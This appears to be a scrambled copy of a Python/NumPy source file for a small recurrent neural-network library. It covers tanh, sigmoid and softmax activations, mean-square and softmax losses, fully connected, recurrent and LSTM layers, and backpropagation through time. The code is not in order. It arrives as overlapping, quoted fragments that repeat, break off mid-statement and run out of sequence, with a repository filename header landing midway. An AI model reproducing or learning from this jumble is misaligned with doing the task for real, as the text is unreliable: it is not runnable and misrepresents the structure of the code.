> 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn,", "* self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells':", "self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _", "-1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous", "dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn", "input * (1 - input) class identity: def __call__(self, input): return input def", "np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it", "(1 + np.exp(-input)) def d(self, input): return input * (1 - input) class", "c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs =", "sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input):", "input): return 1 - input * input class sigmoid: def __call__(self, input): return", "np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells", "def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self, input): return", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1]", "= lambda: len(self.layers) def __call__(self, input): ''' input is to be a rank", "reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def", "predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l", "holds x_i as its rows and dY holds dY_i as its rows In", "* self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire batch", ":] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return", 
"self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]])", "product dW=x.T*dY where x holds x_i as its rows and dY holds dY_i", "activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] *", "= np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]])", "(c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t]", "is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out)", "0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t,", "rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers)", "self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l]", "out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch,", "in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1]", "self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]])", "cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] =", "= previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws':", "dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache", "c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW =", "cache0=None, cost=softmax_loss()): cache = [None] 
* self.num_of_layers() cache_out = [None] * self.num_of_layers() out", "+ self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2", "= cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape)", "= 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws':", "2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 *", "- activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line sums", "input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn'])", "as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] +", "= outputs[t - 1] if t > 0 else h0 previous_cell = cells[t", "the derivative is covered by a previous call to softmax_loss function ''' return", "found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None", "previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. 
/", "cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_", "None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t", "dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn", "batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None:", "dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t -", "have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus", "dH[t - 1] if t > 0 else dh0 dh += dInput[t, :,", "eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs", "dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t", "be used in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size),", "self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps,", "def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i,", "in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_):", "= inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs}", "activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line sums the", "t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0)", "None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] *", 
"h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs =", "= None weights = None activation = None def reset(self): pass def __init__(self,", "entire batch proof: Let x be a single input and dY a single", "d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only", "batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])", ":, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous =", "+ 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] =", "None cell = None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3):", "dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0,", "outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs", "num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): '''", "dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t", "activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation", "scale self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self, input_tensor):", "= input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch,", "* self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init", "lambda: len(self.layers) def __call__(self, input): ''' input is to be a rank 3", "= input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t])", "1] if t > 0 else h0 inputs[t, :, -1] = 1 inputs[t,", "batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = 
np.zeros_like(self.weights) for", "+= np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh =", "self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ =", "input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the", "cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act,", "input class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def", "activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0]", "{'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut,", "np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t,", "= inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in", "self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 *", "it returns 1, as the derivative is covered by a previous call to", "self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch,", "inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:,", "out def init(self): for l in self.layers: l.init() def reset(self): for l in", "cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells']", "- activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t,", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t]", "shape def init(self, 
forget_bias_init=3): ''' forget bias initialization as seen in the paper", "to be a rank 3 tensor ''' out = input for l in", "batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 *", "np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in", "by a previous call to softmax_loss function ''' return 1 class softmax_loss: '''", "self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3", "input): return input def d(self, input): return 1 class mean_square: def __call__(self, input_1,", "= { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if", "x_i as its rows and dY holds dY_i as its rows In other", "np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]])", "raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. 
/ (1.", "inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache,", "for the dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i", "l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None,", "forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2", "None previous = None cell = None def __init__(self, shape): self.shape = shape", "dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t,", "batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t]", "tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers =", "i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer", "activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] =", "of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t])", "is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x", "Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape =", "computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on]", "product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result", "paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4", "dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] #", "outputs[t - 1] if t > 0 else h0 previous_cell = cells[t -", "* dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = 
activations[t, :, 3 * self.shape[1]:]", "cell = None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): '''", "3 * self.shape[1]:] ** 2) ''' the following line sums the gradients over", "l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not", "'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs", "matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :,", "None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn'])", "<filename>rNet.py<gh_stars>10-100 import numpy as np class tanh: def __call__(self, input): return np.tanh(input) def", "shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1,", "t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t,", "+ self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,", "In other words, a product of two matrices is a sum of tensor", "self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]}", "batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in", "''' shape = None weights = None activation = None def reset(self): pass", "cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct =", "''' it computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs)", "= self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if", "in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW", "np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = 
np.tanh(raws_[:, 3 *", ":, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2", "return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer", "inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs']", ":, 3 * self.shape[1]:] ** 2) ''' the following line sums the gradients", "= None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation", "stands for the dot product Now, we have (x_i) matrix and (dY_i) matrix", "self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *=", "out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell", "''' Only to be used as the last non-recursive layer ''' def __call__(self,", "0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights)", "cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else", "= dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if", "is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct =", "+ 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0", "= np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for", "dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :,", "(1. 
+ np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:,", "out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss +=", "previous = outputs[t - 1] if t > 0 else h0 inputs[t, :,", "self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps,", "return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0':", "dCache=None) return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights)", "sum of tensor products of columns and rows of the respected matrices '''", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]])", "'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs =", "activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps,", "which is precisely the matrix product dW=x.T*dY where x holds x_i as its", "= np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ =", "for l in self.layers: out = l(out) return out def init(self): for l", "= 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init", "dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class", "self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous =", "cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t]", "> 0 else h0 previous_cell = cells[t - 1] if t > 0", "probs, train_on=None): ''' it computes 
the softmax loss derivative for optimality ''' tmp_", "1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def", "raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs", "batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs =", "h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t -", "inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws", "raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs':", "input): return input * (1 - input) class identity: def __call__(self, input): return", "1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0", "= inputs for l in range(0, self.num_of_layers()): if cache0 is not None and", "= cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape)", "= activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]]", "batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells =", "inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn =", "raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is", "- 1] if t > 0 else h0 inputs[t, :, -1] = 1", "/ np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor):", "exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None):", "is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous =", "+= np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in 
reversed(range(0,", "d(self, input): return 1 - input * input class sigmoid: def __call__(self, input):", "self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if", "dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire", "1] if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return", ":, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0", "+ np.exp(-input)) def d(self, input): return input * (1 - input) class identity:", "load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: '''", "= None activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation", "loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return", "0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor,", "batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :,", "else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in", "dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have (x_i) matrix", "for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return", "-np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss derivative", "input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to", "dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected", "shape = None weights = None previous = None cell = None def", "/ np.size(input_1) class softmax: ''' Only to be used as the last non-recursive", "None: out, cache[l] = 
self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l]", "self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1] if t", "a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands", "= next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden']", "cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch,", "None def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs,", "layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_)", "= 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t]", ":, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :,", "self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] =", "np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale", "cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers):", "initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0]", "* self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3", "1] if t > 0 else h0 previous_cell = cells[t - 1] if", "+ 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for", "self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous = None def", "= None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget", "http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = 
np.random.randn(self.shape[0] + self.shape[1] + 1, 4 *", "cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ =", "cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] =", "''' return 1 class softmax_loss: ''' To be used in combination with sofmax", "* activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :,", "in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW,", "cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs", "a product of two matrices is a sum of tensor products of columns", "dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM:", "'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape", "% (path,i)) class FC: ''' Fully Connected layer ''' shape = None weights", "= activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt(", "input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1])", "Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None", "> 0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] =", "dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] *", "'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps,", "activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2", "if t > 0 else c0 inputs[t, :, -1] = 1 inputs[t, :,", "outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = 
cache['cells'] c0", "a rank 3 tensor ''' out = input for l in self.layers: out", "init(self): for l in self.layers: l.init() def reset(self): for l in self.layers: l.reset()", "= None cell = None def __init__(self, shape): self.shape = shape def init(self,", "else h0 previous_cell = cells[t - 1] if t > 0 else c0", "__init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to be", "''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None", "save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l", "np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs", "def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out =", "= self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def", "cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch,", "= np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) *", "self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t -", "C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] #", "+ 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if", "= np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] =", "batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t,", "cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for", "1]) outputs = 
